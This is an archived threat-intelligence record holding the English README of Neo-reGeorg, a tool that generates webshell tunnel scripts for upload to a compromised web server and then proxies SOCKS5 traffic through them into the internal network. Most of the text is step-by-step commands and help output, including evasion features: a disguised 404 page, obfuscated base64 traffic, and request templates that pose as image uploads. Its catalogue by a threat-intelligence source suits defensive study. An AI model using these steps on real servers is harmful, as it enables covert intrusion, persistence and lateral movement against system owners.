{
	"id": "e034e24a-7063-41af-a52c-439787efdfe5",
	"created_at": "2026-04-06T00:17:45.533389Z",
	"updated_at": "2026-04-10T13:13:01.118566Z",
	"deleted_at": null,
	"sha1_hash": "b0e2ac91477cfa38435b1be03b35fe8d43bfda21",
	"title": "Neo-reGeorg/README-en.md at master · L-codes/Neo-reGeorg",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 244399,
	"plain_text": "Neo-reGeorg/README-en.md at master · L-codes/Neo-reGeorg\r\nBy L-codes\r\nArchived: 2026-04-05 21:49:05 UTC\r\n简体中文　｜　English\r\nNeo-reGeorg is a project designed to actively restructure reGeorg with the aim of:\r\nImprove usability and avoid feature detection\r\nImprove tunnel connection security\r\nImprove the confidentiality of transmission content\r\nSolve the existing problems of reGeorg and fix some small bugs\r\nThis tool is limited to safety research and teaching, and the user assumes all legal and related\r\nresponsibilities caused by the use of this tool! The author does not bear any legal and related\r\nresponsibilities!\r\nVersion\r\n5.3.0 - Change Log\r\npython dependencies\r\npython -m pip install requests\r\n# Optional\r\npython -m pip install requests[socks] # SOCKS5 proxy support\r\npython -m pip install curl-cffi # Switch to the curl-cffi library for improved performance and\r\npython -m pip install requests_ntlm # NTLM authentication support\r\nFeatures\r\nThe transmission content is encrypted by deformed base64 and disguised as base64 encoding\r\nUse BLV (Byte-LengthOffset-Value) data format to transmit data\r\nDirect request response can be customized (such as a disguised 404 page)\r\nHTTP Headers can be customized\r\nSupport request template\r\nCustom HTTP response code\r\nMultiple URL random requests\r\nServer-side DNS resolution\r\nCompatible with python2 / python3\r\nhttps://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md\r\nPage 1 of 6\n\nHigh compatibility of the server environment, such as the server is unstable, the server is only deployed on\r\nsome machines under load balancing and other special circumstances\r\n(php only) Refer to pivotnacci to create multiple TCP connections for a single session, to deal with some\r\nload balancing scenarios\r\naspx/ashx/jsp/jspx no longer depends on Session, and can run normally in harsh environments such as no\r\ncookies\r\n(non-php \u0026 non-nodejs) supports intranet forwarding to deal with load balancing environment\r\nSupport process to start the server to deal with more scenarios\r\nBasic Usage\r\nStep 1. Set the password to generate tunnel server.(aspx|ashx|jsp|jspx|php) and upload it to the web server.\r\n$ python neoreg.py generate -k password\r\n [+] Create neoreg server files:\r\n =\u003e neoreg_servers/tunnel.jsp\r\n =\u003e neoreg_servers/tunnel.jspx\r\n =\u003e neoreg_servers/tunnel.ashx\r\n =\u003e neoreg_servers/tunnel.aspx\r\n =\u003e neoreg_servers/tunnel.php\r\n =\u003e neoreg_servers/tunnel.go\r\nStep 2. Use neoreg.py to connect to the web server and create a socks5 proxy locally.\r\n$ python3 neoreg.py -k password -u http://xx/tunnel.php\r\n+------------------------------------------------------------------------+\r\n Log Level set to [DEBUG]\r\n Starting socks server [127.0.0.1:1080]\r\n Tunnel at:\r\n http://xx/tunnel.php\r\n+------------------------------------------------------------------------+\r\nAdvanced Usage\r\n1. Support the generated server, by default directly requesting and responding to the specified page content\r\n(such as a disguised 404 page)\r\n$ python neoreg.py generate -k \u003cyou_password\u003e --file 404.html\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003cserver_url\u003e --skip\r\n2. For example, the server WEB needs to set the proxy to access\r\nhttps://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md\r\nPage 2 of 6\n\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003cserver_url\u003e --proxy socks5://10.1.1.1:8080\r\n3. To set Authorization , there are also custom Header or Cookie content.\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003cserver_url\u003e -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cooki\r\n4. Need to disperse requests, upload to multiple paths, such as memory-webshell\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003curl_1\u003e -u \u003curl_2\u003e -u \u003curl_3\u003e ...\r\n5. Turn on http forwarding to cope with load balancing\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003curl\u003e -r \u003credirect_url\u003e\r\n6. Use the port forwarding function, do not start the socks5 service ( 127.0.0.1:1080 -\u003e ip:port )\r\n$ python neoreg.py -k \u003cyou_password\u003e -u \u003curl\u003e -t \u003cip:port\u003e\r\n7. Set the request content template (you need to specify it when generating)\r\n# The request content will be replaced with NEOREGBODY\r\n$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY\u0026save=ok'\r\n$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY\u0026save=ok' -u http://127.0.0.1\r\n# NOTE Allows template content to be written to a file -T file\r\n8. Support the creation process to start a new Neoreg server-side, which can deal with harsh special\r\nenvironments\r\n$ go run neoreg_servers/tunnel.go 8000\r\n$ python3 neoreg.py -k password -u http://127.0.0.1:8000/anysting\r\n9. Supports in-memory proxy format for Node.js. Modify the path in the JS file by adding const path =\r\n'/proxy_path'; , and include the --async-connect parameter for connections.\r\n$ python3 neoreg.py -k password --async-connect -u \u003curl\u003e\r\nFor more information on performance and stability parameters, refer to -h help information\r\n# Generate server-side scripts\r\n$ python neoreg.py generate -h\r\nhttps://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md\r\nPage 3 of 6\n\nusage: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [-c CODE] [--read-buff Bytes]\r\n [--max-read-size KB]\r\n Generate neoreg webshell\r\n optional arguments:\r\n -h, --help show this help message and exit\r\n -k KEY, --key KEY Specify connection key.\r\n -o DIR, --outdir DIR Output directory.\r\n -f FILE, --file FILE Camouflage html page file\r\n -c CODE, --httpcode CODE\r\n Specify HTTP response code. When using -r, it is\r\n recommended to \u003c400 (default: 200)\r\n -T STR/FILE, --request-template STR/FILE\r\n HTTP request template (eg:\r\n 'img=data:image/png;base64,NEOREGBODY\u0026save=ok')\r\n --read-buff Bytes Remote read buffer (default: 513)\r\n --max-read-size KB Remote max read size (default: 512)\r\n# Connection server\r\n$ python neoreg.py -h\r\n usage: neoreg.py [-h] -u URI [-r URL] [-R] [-t IP:PORT] -k KEY [-l IP]\r\n [-p PORT] [-s] [-H LINE] [-c LINE] [-x LINE] [-T STR/FILE]\r\n [-a] [--php-skip-cookie] [--go] [--php-connect-timeout S]\r\n [--local-dns] [--read-buff KB] [--read-interval MS]\r\n [--write-interval MS] [--max-threads N] [--max-retry N]\r\n [--cut-left N] [--cut-right N] [--extract EXPR]\r\n [--ntlm-auth USER:PASS] [-v]\r\n Socks server for Neoreg HTTP(s) tunneller (DEBUG MODE: -k debug)\r\n optional arguments:\r\n -h, --help show this help message and exit\r\n -u URI, --url URI The url containing the tunnel script\r\n -r URL, --redirect-url URL\r\n Intranet forwarding the designated server (only\r\n java/.net)\r\n -R, --force-redirect Forced forwarding (only jsp -r)\r\n -t IP:PORT, --target IP:PORT\r\n Network forwarding Target, After setting this\r\n parameter, port forwarding will be enabled\r\n -k KEY, --key KEY Specify connection key\r\n -l IP, --listen-on IP\r\n The default listening address (default: 127.0.0.1)\r\n -p PORT, --listen-port PORT\r\n The default listening port (default: 1080)\r\n -s, --skip Skip usability testing\r\nhttps://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md\r\nPage 4 of 6\n\n-H LINE, --header LINE\n Pass custom header LINE to server\n -c LINE, --cookie LINE\n Custom init cookies\n -x LINE, --proxy LINE\n Proto://host[:port] Use proxy on given port\n -T STR/FILE, --request-template STR/FILE\n HTTP request template (eg:\n 'img=data:image/png;base64,NEOREGBODY\u0026save=ok')\n -a, --async-connect Asynchronous CONNECT (e.g., in PHP, Node.js)\n --php-skip-cookie Skip cookie availability check in php\n --go Use go connection method\n --php-connect-timeout S\n PHP connect timeout (default: 0.5)\n --local-dns Use local resolution DNS\n --read-buff KB Local read buffer, max data to be sent per POST\n (default: 7, max: 50)\n --read-interval MS Read data interval in milliseconds (default: 300)\n --write-interval MS Write data interval in milliseconds (default: 200)\n --max-threads N Proxy max threads (default: 400)\n --max-retry N Max retry requests (default: 10)\n --cut-left N Truncate the left side of the response body\n --cut-right N Truncate the right side of the response body\n --extract EXPR Manually extract BODY content (eg:\n\nNEOREGBODY\n\n)\n --ntlm-auth USER:PASS\n Enable NTLM authentication for web requests (format:\n DOMAIN\\USER:PASSWORD or USER:PASSWORD)\n -v Increase verbosity level (use -vv or more for greater\n effect)\nRemind\nWhen running neoreg.py with high concurrency on Mac OSX, a large number of network requests will\nbe lost. You can use ulimit -n 2560 to modify the \"maximum number of open files\" of the current shell.\nLicense\nGPL 3.0\nStar History Chart\nhttps://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md\nPage 5 of 6\n\nrepohistory.com\r\n2020 2021 2022 2023 2024 2025 2026\r\n0.5k\r\n1.0k\r\n1.5k\r\n2.0k\r\n2.5k\r\n3.0k\r\nl-codes/Neo-reGeorg\r\nStar History\r\nDate\r\nGitHub Stars\r\nSource: https://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md\r\nhttps://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md"
	],
	"report_names": [
		"README-en.md"
	],
	"threat_actors": [],
	"ts_created_at": 1775434665,
	"ts_updated_at": 1775826781,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b0e2ac91477cfa38435b1be03b35fe8d43bfda21.pdf",
		"text": "https://archive.orkl.eu/b0e2ac91477cfa38435b1be03b35fe8d43bfda21.txt",
		"img": "https://archive.orkl.eu/b0e2ac91477cfa38435b1be03b35fe8d43bfda21.jpg"
	}
}